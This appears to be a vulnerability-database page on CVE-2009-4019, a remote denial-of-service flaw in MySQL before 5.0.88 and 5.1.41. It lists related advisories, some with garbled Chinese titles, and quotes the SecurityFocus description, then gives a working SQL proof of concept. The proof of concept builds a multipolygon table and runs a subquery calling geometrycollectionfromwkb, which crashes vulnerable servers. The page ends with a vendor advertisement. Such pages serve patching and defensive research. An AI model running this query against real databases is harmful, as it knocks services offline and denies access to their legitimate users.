MySQL 6.0.9 'GeomFromWKB()' Function Do
Reporter | Title | Published | Views | Family All 98 |
---|---|---|---|---|
NVD | CVE-2009-4019 | 30 Nov 200917:30 | β | nvd |
Cvelist | CVE-2009-4019 | 30 Nov 200917:00 | β | cvelist |
UbuntuCve | CVE-2009-4019 | 30 Nov 200900:00 | β | ubuntucve |
Veracode | Denial Of Service (DoS) | 10 Apr 202000:43 | β | veracode |
CVE | CVE-2009-4019 | 30 Nov 200917:30 | β | cve |
seebug.org | MySQL SELECTθ―ε₯ε€ηζη»ζε‘ζΌζ΄ | 2 Dec 200900:00 | β | seebug |
seebug.org | MySQLε€δΈͺηΈε½’SQLζδ½ε€ηζη»ζε‘ζΌζ΄ | 17 Dec 200900:00 | β | seebug |
seebug.org | MySQL vulnerabilities | 13 Feb 201000:00 | β | seebug |
Tenable Nessus | Fedora 10 : mysql-5.0.88-1.fc10 (2009-12180) | 14 Dec 200900:00 | β | nessus |
Tenable Nessus | Fedora 11 : mysql-5.1.41-2.fc11 (2009-13504) | 22 Dec 200900:00 | β | nessus |
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo